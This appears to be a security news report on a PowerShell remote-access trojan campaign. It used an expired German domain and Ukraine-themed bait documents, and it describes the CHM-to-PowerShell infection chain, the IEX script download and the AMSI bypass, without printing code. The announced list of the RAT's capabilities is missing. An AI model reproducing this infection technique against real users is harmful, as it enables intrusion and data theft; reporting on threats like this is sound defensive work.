Researchers found an unknown threat actor targeting German users interested in the Ukraine issue and infecting them with a bespoke PowerShell RAT. The malware campaign employs a decoy site to entice users into false news bulletins regarding the Ukraine crisis. These websites provide malicious documents that install a remote administration tool (RAT) that allows remote command execution and file operations.
The threat actors involved in this campaign registered a fake site using an expired German domain name at collaboration-bw[.]de. The website had a bait document called “2022-Q2-Bedrohungslage-Ukraine” that was used to deploy the custom malware. The document purports to include information on Ukraine’s current crises. The download page claims that the document offered critical information regarding the present threat posed by the Ukraine issue. When the victim clicks the link, a ZIP archive is downloaded to their machine. The compressed bundle includes a CHM file consisting of compiled HTML files. If the victim accesses the files, an error message is displayed, while the PowerShell executes a Base64 command.
After de-obfuscating the command, it executes a script obtained from the bogus Baden-Württemberg website using Invoke-Expression (IEX). It then drops two files on the computer in a folder called MonitorHealth.cmd and a script called Status.txt. The .cmd file executes Status.txt through PowerShell.
The malicious function of the custom PowerShell RAT hidden in “Status.txt” starts with collecting basic system information and the assignment of a unique client ID.
The RAT gathers basic system data before sending it to the domain “kleinm[.]de.” It bypasses Windows AMSI (Anti-malware Scan Interface) using an AES-encrypted function named “bypass”.
The following are the RAT’s key capabilities:
It is suspected that a Russian threat actor could be targeting German users, although there are no obvious infrastructure linkages or similarities to existing TTPs. “Attributing this conduct to a single actor is difficult, and there are no solid indicators to support the attribution.”